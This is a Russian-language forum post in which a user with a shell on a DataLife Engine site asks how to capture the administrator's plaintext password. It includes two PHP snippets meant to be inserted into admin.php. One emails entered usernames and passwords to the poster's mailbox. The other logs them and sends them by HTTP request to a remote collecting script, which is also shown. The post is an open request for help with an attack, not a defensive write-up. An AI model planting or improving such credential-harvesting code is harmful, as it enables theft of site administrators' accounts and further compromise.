Вариант узнать пароль админа в DLE если есть шелл

Discussion in 'Безопасность и Анонимность' started by spiderbuber, 29 Aug 2012.

  1. spiderbuber

    spiderbuber New Member

    Joined:
    20 Oct 2010
    Messages:
    63
    Likes Received:
    0
    Reputations:
    0
    Вариант с расшифровкой хеша не рассматриваю, т.к. есть пароли на расшифровку которых уйдёт очень много времени.

    Тестирую на локалке 2 варианта:
    1. Отправка на мыло (файл admin.php)

    PHP:
    $from 'hack@'.$_SERVER['HTTP_HOST'];
    $subject '=?Windows-1251?B?'.trim(@imap_binary('hack')).'?=';
    $headers 'Return-Path: '.$from.''."\r\n";
    $headers .= 'MIME-Version: 1.0'."\r\n";
    $headers .= 'Content-Transfer-Encoding: 8bit'."\r\n";
    $headers .= 'Content-Type: text/plain; charset="Windows-1251"'."\r\n";
    $headers .= 'X-Mailer: PHP v.'.phpversion()."\r\n";
    $headers .= 'From: =?Windows-1251?B?'.trim(imap_binary(addcslashes($var['title'], "\"!@\\!@(!@)"))).'?= <'.$from.'>'."\r\n";
    $headers .= 'Reply-to: '.$from."\r\n";
    @
    mail('my@mail.ru'$subject''.$username.'' ''.$password.''$headers);
    Косяк в том, что мыло приходит только если лог\пасс были введены не верно..

    2. Запись в лог на удалённый хост (файл admin.php)

    PHP:
    $log fopen("log.txt","a+"); 
    fwrite($log,"\n $username:$password"); 
    file_get_contents("http://ourhost.ru/script.php?username=".$username."&password=".$password);
    script.php
    PHP:
    <?PHP 
    $username 
    $_GET['username']; 
    $password $_GET['password']; 
    $log fopen("log.txt","a+"); 
    fwrite($log,"\n $username:$password"); 
    ?>
    Косяк тот же - пишутся только неправильные лог\пассы..

    Может я пытаюсь изобрести велосипед и есть способ проще? Поделитесь плиз!
     
Loading...